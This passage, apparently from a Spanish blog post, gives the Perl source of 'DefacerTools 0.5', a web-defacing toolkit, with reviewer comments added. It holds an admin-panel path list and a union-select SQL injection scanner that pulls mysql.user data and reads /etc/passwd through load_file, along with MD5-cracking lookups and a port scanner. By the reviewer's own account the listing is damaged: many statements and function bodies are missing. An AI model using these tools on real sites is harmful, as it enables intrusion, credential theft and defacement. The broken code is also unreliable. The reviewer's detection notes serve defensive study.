soporten el mismo. Yo hice todas las pruebas con XAMPP y, al parecer, todo funciona bien.
Las funciones del programa son:
- HexConverter
- PanelFinder
- PathsFinder
- SQLi Scanner
- FuzzDNS
- FinderPass
- PortScanner
El código del programa (formateado con perltidy) es:
defacertools.cgi
#!"\xampp\perl\bin\perl.exe"
#
#DefacerTools 0.5
#
#(C) Doddy Hackman 2012
#
#
# NOTE(review): this listing is damaged. Its line breaks were collapsed and
# parts of the script are missing: most `print` keywords / `print qq(` openers
# in front of the HTML fragments, the bodies of encode, bypass, ascii, toma and
# tomax, and the `sub` header of the loop that follows copyright(). It does
# not compile as shown; the comments below describe only what is visible.
#
# What the visible code shows: a CGI script that copies every request
# parameter into %rta and selects a tool by which parameter is set. The tools
# make the web server itself issue HTTP requests and TCP connects to hosts
# named in the request.
#
# Review points that hold for the whole file:
# - No access control is visible. Anyone who can reach the script can make the
#   hosting machine send traffic to arbitrary addresses, internal ones
#   included, so a copy found on a server should be treated as an open relay.
# - Request parameters and fetched page content are printed into HTML and
#   interpolated into regular expressions without escaping.
# - There is no `use strict` / `use warnings`, and most variables are package
#   globals.
# - No Content-Type header is printed in the visible code (it may have been
#   lost with the other print statements).
# - uri_split() is called below, but no module providing it is loaded in the
#   visible `use` lines.
use CGI;
use LWP::UserAgent;
use HTML::LinkExtor;
use IO::Socket;

# Relative paths tried by the PanelFinder branch (appended to the submitted
# page URL). Seen from the target, a run shows up as a burst of requests for
# these admin/login paths from one client.
@panels = (
    'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx',
    'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
    'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
    'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp',
    'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx',
    'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx',
    'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php',
    'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php',
    'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php',
    'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php',
    'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php',
    'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
    'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/',
    'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php',
    'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html',
    'administrator/', 'administrator/index.html', 'administrator/login.html', 'administrator/account.html',
    'administrator/account.php',
    'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php',
    'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html',
    'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php',
    'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp',
    'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp',
    'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp',
    'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/',
    'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html',
    'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/',
    'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html', 'administr8/',
    'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/',
    'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/',
    'sysadmins/', 'admin1/', 'system-administration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
    'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/', 'cpanel/',
    'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/',
    'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
    'login-redirect/', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/', 'smblogin/',
    'customer_login/', 'UserLogin/', 'login-us/',
    'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/',
    'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/',
    'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/',
    'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/',
    'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/',
    'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
    'system_administration/', 'ss_vms_admin_sm/'
);

# Host-name prefixes used by the FuzzDNS branch. Only 'www' is active; the
# longer list is commented out by the author.
my @dns = ('www');

#my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');

# Shared HTTP client with a fixed User-Agent and a 5-second timeout. tomar()
# posts through it; toma()/tomax() presumably do too, but their bodies are
# missing. The User-Agent has no space before "Firefox", which makes it a
# usable log signature for requests sent through this object.
my $nave = LWP::UserAgent->new;
$nave->agent( "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12" );
$nave->timeout(5);

# Copy every request parameter, unvalidated, into %rta.
# `new CGI` is indirect-object syntax; CGI->new is the unambiguous form.
my %rta;
my $que = new CGI;
my @ques = $que->param;
for (@ques) { $rta{$_} = $que->param($_); }

# Page stylesheet, emitted before the dispatcher runs.
print " <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { font: normal 16px Verdana, Arial, Helvetica, sans-serif; background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select { background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 16px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style>";

# Dispatcher. Each tool has two branches: one shows its form (the bare qq(...)
# statements below have lost their `print` in this listing) and one runs the
# tool when the form's text field is present in the request.
if ( $rta{'hex'} ) {
    logouno();
    qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>);
    copyright();
}
elsif ( $rta{'textocode'} ) {

    # NOTE(review): no call to encode() is visible here; presumably lost.
    logouno();
    copyright();
}
elsif ( $rta{'panelfinder'} ) {
    logodos();
    qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>);
    copyright();
}
elsif ( $rta{'buscarpanel'} ) {

    # Passes <submitted page>/<each @panels entry> to tomax() and tests the
    # result with is_success (so tomax presumably returns an HTTP::Response).
    # The success branch is empty in this listing. $path and $code are globals.
    my $page = $rta{'buscarpanel'};
    logodos();
    for $path (@panels) {
        $code = tomax( $page . "/" . $path );
        if ( $code->is_success ) { }
    }
    copyright();
}
elsif ( $rta{'pathsfinder'} ) {
    logotres();
    qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>);
    copyright();
}
elsif ( $rta{'buscarpaths'} ) {

    # Fetches the submitted page, takes its links via get_links(), and for
    # each distinct link directory fetches http://<host><dir> and looks for
    # the text "Index of" (a directory listing).
    # $path1 and $parche come from the submitted URL and from fetched links
    # and are interpolated into patterns unescaped; \Q...\E would keep regex
    # metacharacters in them from being interpreted. $repetidos is an
    # undeclared global used as a space-joined "already seen" list.
    logotres();
    my $page = $rta{'buscarpaths'};
    my $code = toma($page);
    my @links = get_links($code);
    for my $com (@links) {
        my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page);
        if ( $path =~ /\/(.*)$/ ) {
            my $path1 = $1;
            $page =~ s/$path1//ig;
            my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com);
            if ( $path =~ /(.*)\// ) {
                my $parche = $1;
                unless ( $repetidos =~ /$parche/ ) {
                    $repetidos .= " " . $parche;
                    my $code = toma( "http://" . $auth . $parche );
                    if ( $code =~ /Index of (.*)</ig ) {

                        # Captured but not used in the visible code.
                        my $dir_found = $1;
                    }
                }
            }
        }
    }
    copyright();
}
elsif ( $rta{'sqliscanner'} ) {
    logocuatro();
    qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>);
    copyright();
}
elsif ( $rta{'buscarsql'} ) {

    # Calls a user-defined sub named `length` (the & sigil bypasses the
    # builtin). No `sub length` header is visible; presumably it belongs to
    # the headerless body after copyright() below.
    logocuatro();
    &length( $rta{'buscarsql'} );
    copyright();
}
elsif ( $rta{'fuzzdns'} ) {
    logocinco();
    qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>);
    copyright();
}
elsif ( $rta{'buscardns'} ) {

    # Passes http://<each @dns prefix>.<submitted host> to tomax(); the
    # success branch is empty in this listing.
    logocinco();
    my $page = $rta{'buscardns'};
    for my $path (@dns) {
        $code = tomax( "http://" . $path . "." . $page );
        if ( $code->is_success ) { }
    }
    copyright();
}
elsif ( $rta{'finderpass'} ) {
    logoseis();
    qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>);
    copyright();
}
elsif ( $rta{'buscarhash'} ) {
    logoseis();
    &crackit( $rta{'buscarhash'} );
    copyright();
}
elsif ( $rta{'portscanner'} ) {
    logosiete();
    qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>);
    copyright();
}
elsif ( $rta{'buscarpuertos'} ) {
    logosiete();
    scanuno( $rta{'buscarpuertos'} );
    copyright();
}
elsif ( $rta{'home'} ) {
    sintax();
}
else {
    sintax();
}

# Home page with links to the tool forms.
# NOTE(review): the statement that opened this HTML (the closing `);` suggests
# a `print qq(`) is missing from the listing; the same applies to every
# logo* sub below.
sub sintax {
    <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title> <br><br> <h1><center>DefacerTools</center></h1> <br><br> <center> <table border=1> <td class=main><center><b>Tools</b></center></td><tr> <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr> <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr> <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr> <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr> <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr> <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td> </table> </center> );
}

# Banner subs: ASCII-art headings, one per tool. The original line layout of
# the art was lost when the listing was collapsed.
sub logouno {
    <center> <pre> @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@ @@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @ </pre> );
}

sub logodos {
    <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @ </pre> );
}

sub logotres {
    <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @ </pre> );
}

sub logocuatro {
    <center> <pre> @@@ @@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ @ </pre> );
}

sub logocinco {
    <center> <pre> @@@@@ @@@@ @ @ @@@ @ @ @ @@ @ @ @ @ @ @ @@ @ @ @ @ @ @@@@ @@@@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ @ @ @ @@ @ @ @ @@ @ @@@@ @@@@ @@@@ @ @ @@@ </pre> );
}

sub logoseis {
    <center> <pre> @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@ @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@ </pre> );
}

sub logosiete {
    <center> <pre> @@@@@ @@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ </pre> );
}

# Footer with a "Return to home" link (the `print` in front of qq( is missing).
sub copyright {
    qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>);
}

# NOTE(review): the `sub` header for the following body is missing from the
# listing (three closing braces follow the loop but only two are opened here).
# Visible behaviour: for column counts 2..200 it appends one more tagged
# column to a "union select" string built on the submitted URL, fetches it
# with toma(), and stops treating the URL as negative once the marker
# RATSXPDOWN appears in the response. It then prints the URL (unescaped) and
# hands it to details(). @number is never assigned in the visible code, so
# the s/$number[0]/hackman/ substitution cannot be checked from here.
# On the target side this appears as up to 199 consecutive requests to one
# parameter carrying "and 1=0 union select" with a growing column list;
# parameterized queries on the target remove the condition it probes for.
my $rows = "0";
my $asc;
my $page = $_[0];
( $pass1, $pass2 ) = &bypass( $_[1] );
$alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")";
$total = "1";
for my $rows ( 2 .. 200 ) {
    $asc .= "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")";
    $total .= "," . $rows;
    $injection = $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $alert . $asc;
    $test = toma($injection);
    if ( $test =~ /RATSXPDOWN/ ) {
        $control = 1;
        my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );
        my $save = $auth;
        $total =~ s/$number[0]/hackman/;
        print "[SQLI] : " . $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total . "<br>";
        details( $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total, "--", "" );
    }
}
}
}

# details($page, $bypass, $save): follow-up requests against a URL that
# contains the placeholder "hackman".
# The placeholder is replaced by expressions wrapped in the fixed marker
# char(69,82,84,79,82,56,53,52), which spells "ERTOR854" (the string the
# response checks look for). Three probes are sent: a select from
# information_schema.tables, one from mysql.user, and a load_file() of
# 0x2f6574632f706173737764 (hex for "/etc/passwd"); a fourth request asks for
# version(), database() and user(). The branches that reported the results
# are empty in this listing and the final string has lost its `print`.
# The literal marker and hex string are sent in the request URL as written
# here, so they are usable signatures in web-server and WAF logs.
sub details {
    my ( $page, $bypass, $save ) = @_;
    ( $pass1, $pass2 ) = &bypass($bypass);
    if ( $page =~ /(.*)hackman(.*)/ig ) {
        my ( $start, $end ) = ( $1, $2 );
        $inforschema = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "information_schema.tables" . $pass2;
        $mysqluser = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "mysql.user" . $pass2;
        $test3 = toma( $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" . $end . $pass2 );
        $test1 = toma($inforschema);
        $test2 = toma($mysqluser);
        if ( $test2 =~ /ERTOR854/ig ) { } else { }
        if ( $test1 =~ /ERTOR854/ig ) { } else { }
        if ( $test3 =~ /ERTOR854/ig ) { }
        $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
        $injection = $start . $concat . $end . $pass2;
        $code = toma($injection);
        if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) {
            "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>";
        }
        else { }
    }
}

# NOTE(review): encode() is truncated (an unmatched closing brace follows it),
# and bypass(), ascii(), toma() and tomax() have empty bodies in this listing.
# What they return cannot be determined from here.
sub encode {
    my $string = $_[0];
    $hex = '0x';
}
}

sub bypass { }

sub ascii { }

sub toma { }

sub tomax { }

# get_links($html): parses the argument with HTML::LinkExtor, using agarrar
# as the per-link callback. The callback body and any return statement are
# missing from the listing. A named sub declared inside another sub is still
# a package-level sub in Perl; it is not private to get_links.
sub get_links {
    $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] );

    sub agarrar {
        my ( $a, %b ) = @_;
    }
}

# crackit($md5): looks the hash up on six third-party sites and prints any
# capture as "<hash>:<plaintext>".
# - The hash is sent to external services over plain http://, so running this
#   discloses it to those sites and to anyone on the path.
# - The 'variables' and 'regex' values are single-quoted, so the $_[0] inside
#   them is literal text at this point, and tomar() dereferences the
#   'variables' string with %{...}, a symbolic reference that `use strict`
#   would reject.
# - $secret and the captured remote text are printed into HTML unescaped.
sub crackit {
    my $secret = $_[0];
    my %hash = (
        'http://passcracking.com/' => {
            'tipo' => 'post',
            'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}',
            'regex' => '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>',
        },
        'http://md5.hashcracking.com/search.php?md5=' => {
            'tipo' => 'get',
            'regex' => 'Cleartext of $_[0] is (.*)',
        },
        'http://www.bigtrapeze.com/md5/' => {
            'tipo' => 'post',
            'variables' => '{"query" => $_[0], "submit" => " Crack "}',
            'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>',
        },
        'http://opencrack.hashkiller.com/' => {
            'tipo' => 'post',
            'variables' => '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}',
        },
        'http://www.hashchecker.com/index.php?_sls=search_hash' => {
            'tipo' => 'post',
            'variables' => '{"search_field" => $_[0], "Submit" => "search"}',
            'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl',
        },
        'http://victorov.su/md5/?md5e=&md5d=' => {
            'tipo' => 'get',
        }
    );
    for my $data ( keys %hash ) {
        if ( $hash{$data}{tipo} eq "get" ) {

            # GET services: the hash is appended to the URL.
            $code = toma( $data . $_[0] );
            if ( $code =~ /$hash{$data}{regex}/ig ) {
                print "<br>[+] Decoded : " . $1 . "<br><br>";
                print $secret. ":" . $1 . "<br>";
            }
        }
        else {

            # POST services: form fields come from the 'variables' entry.
            $code = tomar( $data, $hash{$data}{variables} );
            if ( $code =~ /$hash{$data}{regex}/ig ) {
                print $secret. ":" . $1 . "<br>";
            }
        }
    }
    print "<br>[+] Finish<br>";
}

# tomar($web, $var): POSTs the key/value pairs in %$var to $web through the
# shared $nave client and returns the response body.
sub tomar {
    my ( $web, $var ) = @_;
    return $nave->post( $web, [ %{$var} ] )->content;
}

# scanuno($host): attempts a TCP connect (0.5 s timeout) from the web server
# to six fixed ports on $host and prints the ones that accept.
# $host is the raw `buscarpuertos` request parameter. It is echoed into the
# page unescaped (reflected XSS), and because the connects originate from the
# hosting machine, an exposed copy lets a remote client probe addresses that
# only that machine can reach.
sub scanuno {
    my %ports = (
        "21" => "ftp",
        "22" => "ssh",
        "25" => "smtp",
        "80" => "http",
        "110" => "pop3",
        "3306" => "mysql"
    );
    print "<br>[+] Scanning $_[0]<br><br><br>";
    for my $port ( keys %ports ) {
        if ( new IO::Socket::INET( PeerAddr => $_[0], PeerPort => $port, Proto => "tcp", Timeout => 0.5 ) ) {
            print "[Port] : " . $port . " [Service] : " . $ports{$port} . "<br>";
        }
    }
    print "<br><br>[+] Scan Finish<br>";
}

# The End ?